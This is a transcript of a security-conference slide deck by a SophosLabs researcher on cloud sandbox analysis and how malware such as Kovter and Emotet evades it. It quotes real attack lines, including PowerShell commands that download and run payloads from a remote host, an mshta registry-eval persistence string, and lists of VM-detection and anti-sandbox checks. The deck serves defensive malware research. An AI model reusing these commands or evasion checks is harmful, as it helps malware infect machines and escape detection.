session id:air-f03 playing games in the sandbox… · playing games in the sandbox— dynamic...

46
SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos

Upload: dangdan

Post on 11-Jun-2018

229 views

Category:

Documents


0 download

TRANSCRIPT

  • SESSION ID:

    #RSAC

    Michael Wood

    PLAYING GAMES IN THE SANDBOXDYNAMIC ANALYSIS AND MODERN EVASION TACTICS

    AIR-F03

    Senior Manager, Dynamic Protection, SophosLabsSophos

  • # R S A C

    Cloud Sandbox

    2

    Internet

    Known Good Execute Known Bad?

    Sandbox

  • # R S A C

    Malware comes in all shapes and sizes o Windows executableso Office & PDF documentso Scripts, Java, Windows Shortcutso Zip, Tar, Rar, & archives

    Detect 0-day threats based on behavior

    What is a Cloud Sandbox useful for?

    3

  • # R S A C

    Example: 0-day DDE exploit

    4

    Intended use spreadsheet data link{ DDEAUTO excel "C:\\My Documents\\Profits.xls "Sheet1!R1C1:R4C4" \p }

    Exploited use malware download{ DDEAUTO cmd.exe /k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1 }

  • # R S A C

    Malware comes in all shapes and sizes o Windows executableso Office & PDF documentso Scripts, Java, Windows Shortcutso Zip, Tar, Rar, & archives

    Detect 0-day threats based on behavior

    But what if the threat behaves differently in the Sandbox?

    What is a Cloud Sandbox useful for?

    5

  • # R S A C

    Evasive threats

    6

    IF is_sandbox() THENsomething_good()

    ELSEsomething_bad()

  • # R S A C

    is_sandbox()

    Artifacts: Files, Registry Keys, Drivers, Disk/CPU names Behavior: CPU behavior

    Anti-VM

    Artifacts: tools or scripts, realistic hardware Behavior: human-like activity

    Anti-sandbox

    Explicit delay: Sleep() Implicit delay: user interaction required

    Timing

  • # R S A C

    something_good()

    ExitProcess() Loop forever Self delete

  • #RSAC

    IN THE WILD

  • # R S A C

    Kovter Malware

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCU\\software\\4a9e7b11c0\\6bee3829"); eval(ztJ4n7);

  • # R S A C

    Kovter VM Evasion Tests

    11

    Running processesVBoxService.exeVMwareUser.exe

    Registry keysHARDWARE\\ACPI\\DSDT\\VBOX__

    HKLM\\SOFTWARE\\VMWare, Inc.

    Other artifacts\\.\vmmemctl PIPEVMwareCopyPasteSetClipboard event

  • # R S A C

    CPUID - Artifacts

    CPUID Vendor -> GenuineIntelCPUID Hypervisor -> 0x0

    CPUID Vendor -> KVMKVMKVMCPUID Hypervisor -> 0x80000000

  • # R S A C

    CPUID - Timing

    CPUID

    CPUID

    GenuineIntel

    t1

    t2

    t1t2

    CPUID cost

  • # R S A C

    Evasive Activity

    Legitimacy

  • #RSAC

    ACTIVE EVASIONS

  • # R S A C

    Document Malware

  • # R S A C

    Macro Evasion: Realistic Filename

    Is my file name

    only hexadecimal characters?

  • # R S A C

    Macro Evasion: Realistic History

    Is there fewer than 3 recently used

    files?

  • # R S A C

    Macro Evasion: Blacklist Processes

    Are there any VM or analysis tools

    running?

  • # R S A C

    Macro Evasion: GEO IP

    Does the GEO IP match my target?

  • # R S A C

    Leverage #1 - Protection

    is_sandbox() something_bad()

  • # R S A C

    Leverage #2 Bypass

    Does C:\B78AE926 exist?

    No: Run evasions

    Yes: Run malware

  • # R S A C

    Leverage #3 - Vaccination

    is_sandbox() == TRUE

  • #RSAC

    PASSIVE EVASIONS

  • # R S A C

    Documents: Some Clicks Required

  • # R S A C

    Time: 0 min Time: 2 min

    Time: 5 min

    Explicit Delay

    powershell sleep 300;new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',%TEMP%\Local.exe')& start-process %TEMP%\Local.exe'"

    Sandbox Analysis

  • # R S A C

    Implicit Delay: Busy work

    FOR i=0; i < 500,000; i++ DOIsDebuggerPresent()

    END FOR

    Bare Metal Virtual Machine Sandbox

  • # R S A C

    Typical Human Input

    GetLastInputInfo() GetCursorPos()

  • # R S A C

    File Structure

    > unzip -l IMAGES.ZIP

    Length Date Time Name--------- ---------- ----- ----

    518144 2018-01-17 02:17 IMG_1715.jpg

  • #RSAC

    EVASIVE TIMELINE: EMOTET

  • # R S A C

    Emotet Delivery: Some Clicks Required

  • # R S A C

    Emotet: Custom Loader

    Jul 2017 Decrypts in-place Aug 2017 Loader added

    Packed EXE decrypt Emotet EXE Packed EXE decrypt

    EmotetEXE

    Loader EXE

  • # R S A C

    Emotet EXE

    Emotet Oct 2017, is_sandbox() v1

    Loader EXEevasions

    is_sandboxsample.exe artifact.exe

    John Doe

    TEQUILABOOMBOOM Wilbert / SC

    admin / SystemIT

    C:\123\email.doc C:\email.htm C:\email.doc

  • # R S A C

    Emotet: Loader In-Memory Obfuscation

    Emotet EXE

    Loader EXEbusy work

    Stolen Code

    1. New memory region for stolen instructions

    2. Steal instructions from EXE, patch in detour to busy work routine

    evasions

  • # R S A C

    Emotet: Dec 2017, is_sandbox() v2

    Loader Evasions V1

    String comparisons tested via lstrcmpA API

    File existence tested via CreateFileA API

    Sandbox detected => ExitProcess()

    Loader Evasions V2

    String comparisons inline strcmpfunction, no API

    File existence full file system enumeration via FindFirstFile API

    Sandbox detected => repeat evasion tests, infinitely

  • # R S A C

    Emotet: Dec 2017, is_sandbox() v2

    Loader Evasions V1

    String comparisons tested via lstrcmpA API

    File existence tested via CreateFileA API

    Sandbox detected => ExitProcess()

    Loader Evasions V2

    String comparisons inline strcmpfunction, no API

    File existence full file system enumeration via FindFirstFile API

    Sandbox detected => repeat evasion tests, infinitely

    Hide sensitive strings, like TEQUILABOOMBOOM

    Queries for sensitive data remain

  • # R S A C

    Emotet: Dec 2017, is_sandbox() v2

    Loader Evasions V1

    String comparisons tested via lstrcmpA API

    File existence tested via CreateFileA API

    Sandbox detected => ExitProcess()

    Loader Evasions V2

    String comparisons inline strcmpfunction, no API

    File existence full file system enumeration via FindFirstFile API

    Sandbox detected => repeat evasion tests, infinitely

    Hide sensitive strings, like sample.exe

    Huge increase in file system inspection activity

  • # R S A C

    Emotet: Dec 2017, is_sandbox() v2

    Loader Evasions V1

    String comparisons tested via lstrcmpA API

    File existence tested via CreateFileA API

    Sandbox detected => ExitProcess()

    Loader Evasions V2

    String comparisons inline strcmpfunction, no API

    File existence full file system enumeration via FindFirstFile API

    Sandbox detected => repeat evasion tests, infinitely

    Avoid bailout tell

    Repeated increase in file system inspection activity

  • # R S A C

    Emotet: Jan 2018, Evasion Fragments

    39

    is_sandbox() disabled, but

    Dec 2017

    TEQUILABOOMBOOM

    SystemIT

    John Doe

    Jan 2018

    "T E Q U I L A B O O M B O O M

    S y s t e m I T

    Aller Doe

  • # R S A C

    Emotet: Feb 2018, Evasion Retraction

    Emotet EXE

    Loader EXE

    Stolen Code

    busy work

    evasions

  • # R S A C

    Emotet Evasive Tactic Timeline

    Jul 2017Busy work

    Aug 2017Loader module

    Oct 2017is_sandbox v1

    Dec 2017is_sandbox v2something_good

    v2

    Jan 2018is_sandbox offFragments

    remain

    Feb 2018is_sandbox

    removed

  • #RSAC

    TAKEAWAYS

  • # R S A C

    Summary

    Leverage is_sandbox() == something_bad()

    Battle ground Infinitely many tactics, equally many defenses

    Raise the bar Attacks require greater depth & complexity

  • # R S A C

    Predictions

    Virtual machine tactics - expect declineExisting mitigations, assets in the cloud

    Human-like behavior expect growthReal user activity, victim profiling

    Avoid detonation expect growthDodge execution in the Sandbox altogether

  • # R S A C

    Actions: Engage, Familiarize, Experiment

    Security partners approach to evasive threatsEngage Open-source tools to test anti-sandbox tacticsFamiliarize Deploy your own open-source sandboxExperiment

    PAFish Tool https://github.com/a0rtega/pafishAl-Khaser Tool https://github.com/LordNoteworthy/al-khaserCuckoo Sandbox https://cuckoosandbox.org/

    https://github.com/a0rtega/pafishhttps://github.com/LordNoteworthy/al-khaserhttps://cuckoosandbox.org/

  • #RSAC

    THANK YOU

    Playing Games in the SandboxDynamic Analysis and Modern Evasion TacticsCloud SandboxWhat is a Cloud Sandbox useful for?Example: 0-day DDE exploitWhat is a Cloud Sandbox useful for?Evasive threatsis_sandbox()something_good()In the wildKovter MalwareKovter VM Evasion TestsCPUID - ArtifactsCPUID - TimingSlide Number 14Active evasionsDocument MalwareMacro Evasion: Realistic Filename Macro Evasion: Realistic HistoryMacro Evasion: Blacklist Processes Macro Evasion: GEO IPLeverage #1 - ProtectionLeverage #2 BypassLeverage #3 - VaccinationPassive EvasionsDocuments: Some Clicks RequiredExplicit DelayImplicit Delay: Busy workTypical Human InputFile StructureEvasive timeline: EmotetEmotet Delivery: Some Clicks RequiredEmotet: Custom LoaderEmotet Oct 2017, is_sandbox() v1Emotet: Loader In-Memory ObfuscationEmotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Jan 2018, Evasion FragmentsEmotet: Feb 2018, Evasion RetractionEmotet Evasive Tactic TimelineTakeawaysSummaryPredictionsActions: Engage, Familiarize, ExperimentThank you